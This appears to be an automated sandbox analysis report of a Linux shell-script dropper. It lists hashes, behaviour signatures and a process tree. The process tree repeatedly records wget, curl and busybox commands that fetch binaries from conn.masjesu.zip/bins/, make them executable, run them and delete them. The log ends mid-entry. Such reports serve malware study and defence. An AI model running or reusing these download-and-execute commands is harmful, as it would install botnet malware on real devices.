Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    25/10/2024, 01:07

General

  • Target

    1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh

  • Size

    10KB

  • MD5

    1fe6de8ea9975b311fc0e7781eb48271

  • SHA1

    0c4e405af7c4633878c5fe55ca2a93a111c45b28

  • SHA256

    1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6

  • SHA512

    c1f9d15954ddaecc45fbdd9d188ba6d924ed25ffc0189ce438e1268255bd408a21d55458542ccb4b443da6c83f871f85b6112b44a58955401faf873439dc7685

  • SSDEEP

    192:VS45ohPHiZlxVr/SFlVGr/SFl/nFPHiZlX:VSioUQDw

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 28 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 28 IoCs
  • Reads runtime system information 28 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 64 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 28 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
    /tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
    1⤵
      PID:708
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:713
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
          2⤵
          • System Network Configuration Discovery
          PID:715
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:748
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
          2⤵
          • System Network Configuration Discovery
          PID:771
        • /bin/chmod
          chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
          2⤵
          • File and Directory Permissions Modification
          PID:779
        • /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
          ./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
          2⤵
          • Executes dropped EXE
          PID:780
        • /bin/rm
          rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
          2⤵
            PID:783
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
            2⤵
              PID:784
            • /usr/bin/curl
              curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:788
            • /bin/busybox
              /bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
              2⤵
              • System Network Configuration Discovery
              PID:791
            • /bin/chmod
              chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
              2⤵
              • File and Directory Permissions Modification
              PID:792
            • /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
              ./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
              2⤵
              • Executes dropped EXE
              PID:793
            • /bin/rm
              rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
              2⤵
                PID:794
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                2⤵
                • System Network Configuration Discovery
                PID:795
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                2⤵
                • Reads runtime system information
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:796
              • /bin/busybox
                /bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                2⤵
                  PID:798
                • /bin/chmod
                  chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                  2⤵
                  • File and Directory Permissions Modification
                  PID:799
                • /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                  ./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                  2⤵
                  • Executes dropped EXE
                  PID:800
                • /bin/rm
                  rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                  2⤵
                    PID:801
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                    2⤵
                    • System Network Configuration Discovery
                    PID:802
                  • /usr/bin/curl
                    curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                    2⤵
                    • Reads runtime system information
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:803
                  • /bin/busybox
                    /bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                    2⤵
                    • System Network Configuration Discovery
                    PID:810
                  • /bin/chmod
                    chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                    2⤵
                    • File and Directory Permissions Modification
                    PID:813
                  • /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                    ./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                    2⤵
                    • Executes dropped EXE
                    PID:815
                  • /bin/rm
                    rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                    2⤵
                      PID:818
                    • /usr/bin/wget
                      wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                      2⤵
                      • System Network Configuration Discovery
                      PID:819
                    • /usr/bin/curl
                      curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                      2⤵
                      • Reads runtime system information
                      • System Network Configuration Discovery
                      • Writes file to tmp directory
                      PID:826
                    • /bin/busybox
                      /bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                      2⤵
                      • System Network Configuration Discovery
                      PID:833
                    • /bin/chmod
                      chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                      2⤵
                      • File and Directory Permissions Modification
                      PID:841
                    • /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                      ./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                      2⤵
                      • Executes dropped EXE
                      PID:843
                    • /bin/rm
                      rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                      2⤵
                        PID:845
                      • /usr/bin/wget
                        wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                        2⤵
                        • System Network Configuration Discovery
                        PID:846
                      • /usr/bin/curl
                        curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                        2⤵
                        • Reads runtime system information
                        • System Network Configuration Discovery
                        • Writes file to tmp directory
                        PID:847
                      • /bin/busybox
                        /bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                        2⤵
                        • System Network Configuration Discovery
                        PID:852
                      • /bin/chmod
                        chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                        2⤵
                        • File and Directory Permissions Modification
                        PID:853
                      • /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                        ./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                        2⤵
                        • Executes dropped EXE
                        PID:854
                      • /bin/rm
                        rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                        2⤵
                          PID:855
                        • /usr/bin/wget
                          wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                          2⤵
                            PID:856
                          • /usr/bin/curl
                            curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                            2⤵
                            • Reads runtime system information
                            • System Network Configuration Discovery
                            • Writes file to tmp directory
                            PID:857
                          • /bin/busybox
                            /bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                            2⤵
                              PID:859
                            • /bin/chmod
                              chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                              2⤵
                              • File and Directory Permissions Modification
                              PID:860
                            • /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                              ./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                              2⤵
                              • Executes dropped EXE
                              PID:861
                            • /bin/rm
                              rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                              2⤵
                                PID:862
                              • /usr/bin/wget
                                wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                2⤵
                                  PID:863
                                • /usr/bin/curl
                                  curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                  2⤵
                                  • Reads runtime system information
                                  • System Network Configuration Discovery
                                  • Writes file to tmp directory
                                  PID:864
                                • /bin/busybox
                                  /bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                  2⤵
                                  • System Network Configuration Discovery
                                  PID:866
                                • /bin/chmod
                                  chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:867
                                • /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                  ./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                  2⤵
                                  • Executes dropped EXE
                                  PID:868
                                • /bin/rm
                                  rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
                                  2⤵
                                    PID:869
                                  • /usr/bin/wget
                                    wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                    2⤵
                                    • System Network Configuration Discovery
                                    PID:870
                                  • /usr/bin/curl
                                    curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                    2⤵
                                    • Reads runtime system information
                                    • System Network Configuration Discovery
                                    • Writes file to tmp directory
                                    PID:871
                                  • /bin/busybox
                                    /bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                    2⤵
                                    • System Network Configuration Discovery
                                    PID:873
                                  • /bin/chmod
                                    chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:874
                                  • /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                    ./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                    2⤵
                                    • Executes dropped EXE
                                    PID:875
                                  • /bin/rm
                                    rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
                                    2⤵
                                      PID:876
                                    • /usr/bin/wget
                                      wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                      2⤵
                                        PID:877
                                      • /usr/bin/curl
                                        curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                        2⤵
                                        • Reads runtime system information
                                        • System Network Configuration Discovery
                                        • Writes file to tmp directory
                                        PID:878
                                      • /bin/busybox
                                        /bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                        2⤵
                                          PID:880
                                        • /bin/chmod
                                          chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:881
                                        • /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                          ./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                          2⤵
                                          • Executes dropped EXE
                                          PID:882
                                        • /bin/rm
                                          rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
                                          2⤵
                                            PID:883
                                          • /usr/bin/wget
                                            wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                            2⤵
                                              PID:884
                                            • /usr/bin/curl
                                              curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                              2⤵
                                              • Reads runtime system information
                                              • System Network Configuration Discovery
                                              • Writes file to tmp directory
                                              PID:885
                                            • /bin/busybox
                                              /bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                              2⤵
                                              • System Network Configuration Discovery
                                              PID:887
                                            • /bin/chmod
                                              chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:888
                                            • /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                              ./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                              2⤵
                                              • Executes dropped EXE
                                              PID:889
                                            • /bin/rm
                                              rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
                                              2⤵
                                                PID:890
                                              • /usr/bin/wget
                                                wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                2⤵
                                                • System Network Configuration Discovery
                                                PID:891
                                              • /usr/bin/curl
                                                curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                2⤵
                                                • Reads runtime system information
                                                • System Network Configuration Discovery
                                                • Writes file to tmp directory
                                                PID:892
                                              • /bin/busybox
                                                /bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                2⤵
                                                • System Network Configuration Discovery
                                                PID:894
                                              • /bin/chmod
                                                chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                2⤵
                                                • File and Directory Permissions Modification
                                                PID:895
                                              • /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                ./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                2⤵
                                                • Executes dropped EXE
                                                PID:896
                                              • /bin/rm
                                                rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                2⤵
                                                  PID:897
                                                • /usr/bin/wget
                                                  wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                  2⤵
                                                    PID:898
                                                  • /usr/bin/curl
                                                    curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                    2⤵
                                                    • Reads runtime system information
                                                    • System Network Configuration Discovery
                                                    • Writes file to tmp directory
                                                    PID:899
                                                  • /bin/busybox
                                                    /bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                    2⤵
                                                    • System Network Configuration Discovery
                                                    PID:901
                                                  • /bin/chmod
                                                    chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                    2⤵
                                                    • File and Directory Permissions Modification
                                                    PID:902
                                                  • /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                    ./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:903
                                                  • /bin/rm
                                                    rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                    2⤵
                                                      PID:904
                                                    • /usr/bin/wget
                                                      wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                      2⤵
                                                      • System Network Configuration Discovery
                                                      PID:905
                                                    • /usr/bin/curl
                                                      curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                      2⤵
                                                      • Reads runtime system information
                                                      • System Network Configuration Discovery
                                                      • Writes file to tmp directory
                                                      PID:906
                                                    • /bin/busybox
                                                      /bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                      2⤵
                                                        PID:908
                                                      • /bin/chmod
                                                        chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                        2⤵
                                                        • File and Directory Permissions Modification
                                                        PID:909
                                                      • /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                        ./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:910
                                                      • /bin/rm
                                                        rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                        2⤵
                                                          PID:911
                                                        • /usr/bin/wget
                                                          wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                          2⤵
                                                          • System Network Configuration Discovery
                                                          PID:912
                                                        • /usr/bin/curl
                                                          curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                          2⤵
                                                          • Reads runtime system information
                                                          • System Network Configuration Discovery
                                                          • Writes file to tmp directory
                                                          PID:913
                                                        • /bin/busybox
                                                          /bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                          2⤵
                                                            PID:915
                                                          • /bin/chmod
                                                            chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:916
                                                          • /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                            ./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:917
                                                          • /bin/rm
                                                            rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
                                                            2⤵
                                                              PID:918
                                                            • /usr/bin/wget
                                                              wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                              2⤵
                                                              • System Network Configuration Discovery
                                                              PID:919
                                                            • /usr/bin/curl
                                                              curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                              2⤵
                                                              • Reads runtime system information
                                                              • System Network Configuration Discovery
                                                              • Writes file to tmp directory
                                                              PID:920
                                                            • /bin/busybox
                                                              /bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                              2⤵
                                                                PID:922
                                                              • /bin/chmod
                                                                chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                                2⤵
                                                                • File and Directory Permissions Modification
                                                                PID:923
                                                              • /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                                ./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:924
                                                              • /bin/rm
                                                                rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
                                                                2⤵
                                                                  PID:925
                                                                • /usr/bin/wget
                                                                  wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                                  2⤵
                                                                  • System Network Configuration Discovery
                                                                  PID:926
                                                                • /usr/bin/curl
                                                                  curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                                  2⤵
                                                                  • Reads runtime system information
                                                                  • Writes file to tmp directory
                                                                  PID:927
                                                                • /bin/busybox
                                                                  /bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                                  2⤵
                                                                    PID:929
                                                                  • /bin/chmod
                                                                    chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                                    2⤵
                                                                    • File and Directory Permissions Modification
                                                                    PID:930
                                                                  • /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                                    ./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:931
                                                                  • /bin/rm
                                                                    rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
                                                                    2⤵
                                                                      PID:932
                                                                    • /usr/bin/wget
                                                                      wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
                                                                      2⤵
                                                                      • System Network Configuration Discovery
                                                                      PID:933
                                                                    • /usr/bin/curl
                                                                      curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
                                                                      2⤵
                                                                      • Reads runtime system information
                                                                      • System Network Configuration Discovery
                                                                      • Writes file to tmp directory
                                                                      PID:934
                                                                    • /bin/busybox
                                                                      /bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
                                                                      2⤵
                                                                      • System Network Configuration Discovery
                                                                      PID:936
                                                                    • /bin/chmod
                                                                      chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
                                                                      2⤵
                                                                      • File and Directory Permissions Modification
                                                                      PID:937
                                                                    • /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
                                                                      ./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:938
                                                                    • /bin/rm
                                                                      rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
                                                                      2⤵
                                                                        PID:939
                                                                      • /usr/bin/wget
                                                                        wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                                                                        2⤵
                                                                        • System Network Configuration Discovery
                                                                        PID:940
                                                                      • /usr/bin/curl
                                                                        curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                                                                        2⤵
                                                                        • Reads runtime system information
                                                                        • System Network Configuration Discovery
                                                                        • Writes file to tmp directory
                                                                        PID:941
                                                                      • /bin/busybox
                                                                        /bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                                                                        2⤵
                                                                        • System Network Configuration Discovery
                                                                        PID:943
                                                                      • /bin/chmod
                                                                        chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                                                                        2⤵
                                                                        • File and Directory Permissions Modification
                                                                        PID:944
                                                                      • /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                                                                        ./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:945
                                                                      • /bin/rm
                                                                        rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
                                                                        2⤵
                                                                          PID:946
                                                                        • /usr/bin/wget
                                                                          wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                                                                          2⤵
                                                                            PID:947
                                                                          • /usr/bin/curl
                                                                            curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                                                                            2⤵
                                                                            • Reads runtime system information
                                                                            • System Network Configuration Discovery
                                                                            • Writes file to tmp directory
                                                                            PID:948
                                                                          • /bin/busybox
                                                                            /bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                                                                            2⤵
                                                                            • System Network Configuration Discovery
                                                                            PID:950
                                                                          • /bin/chmod
                                                                            chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                                                                            2⤵
                                                                            • File and Directory Permissions Modification
                                                                            PID:951
                                                                          • /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                                                                            ./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:952
                                                                          • /bin/rm
                                                                            rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
                                                                            2⤵
                                                                              PID:953
                                                                            • /usr/bin/wget
                                                                              wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                                                                              2⤵
                                                                              • System Network Configuration Discovery
                                                                              PID:954
                                                                            • /usr/bin/curl
                                                                              curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                                                                              2⤵
                                                                              • Reads runtime system information
                                                                              • System Network Configuration Discovery
                                                                              • Writes file to tmp directory
                                                                              PID:955
                                                                            • /bin/busybox
                                                                              /bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                                                                              2⤵
                                                                              • System Network Configuration Discovery
                                                                              PID:957
                                                                            • /bin/chmod
                                                                              chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                                                                              2⤵
                                                                              • File and Directory Permissions Modification
                                                                              PID:958
                                                                            • /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                                                                              ./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              PID:959
                                                                            • /bin/rm
                                                                              rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
                                                                              2⤵
                                                                                PID:960
                                                                              • /usr/bin/wget
                                                                                wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
                                                                                2⤵
                                                                                  PID:961
                                                                                • /usr/bin/curl
                                                                                  curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
                                                                                  2⤵
                                                                                  • Reads runtime system information
                                                                                  • System Network Configuration Discovery
                                                                                  • Writes file to tmp directory
                                                                                  PID:962
                                                                                • /bin/busybox
                                                                                  /bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
                                                                                  2⤵
                                                                                  • System Network Configuration Discovery
                                                                                  PID:964
                                                                                • /bin/chmod
                                                                                  chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
                                                                                  2⤵
                                                                                  • File and Directory Permissions Modification
                                                                                  PID:965
                                                                                • /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
                                                                                  ./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:966
                                                                                • /bin/rm
                                                                                  rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
                                                                                  2⤵
                                                                                    PID:967
                                                                                  • /usr/bin/wget
                                                                                    wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                                                                                    2⤵
                                                                                    • System Network Configuration Discovery
                                                                                    PID:968
                                                                                  • /usr/bin/curl
                                                                                    curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                                                                                    2⤵
                                                                                    • Reads runtime system information
                                                                                    • Writes file to tmp directory
                                                                                    PID:969
                                                                                  • /bin/busybox
                                                                                    /bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                                                                                    2⤵
                                                                                      PID:971
                                                                                    • /bin/chmod
                                                                                      chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                                                                                      2⤵
                                                                                      • File and Directory Permissions Modification
                                                                                      PID:972
                                                                                    • /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                                                                                      ./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:973
                                                                                    • /bin/rm
                                                                                      rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
                                                                                      2⤵
                                                                                        PID:974
                                                                                      • /usr/bin/wget
                                                                                        wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                                                                                        2⤵
                                                                                        • System Network Configuration Discovery
                                                                                        PID:975
                                                                                      • /usr/bin/curl
                                                                                        curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                                                                                        2⤵
                                                                                        • Reads runtime system information
                                                                                        • System Network Configuration Discovery
                                                                                        • Writes file to tmp directory
                                                                                        PID:976
                                                                                      • /bin/busybox
                                                                                        /bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
                                                                                        2⤵
                                                                                        • System Network Configuration Discovery
                                                                                        PID:978
                                                                                      • /bin/chmod
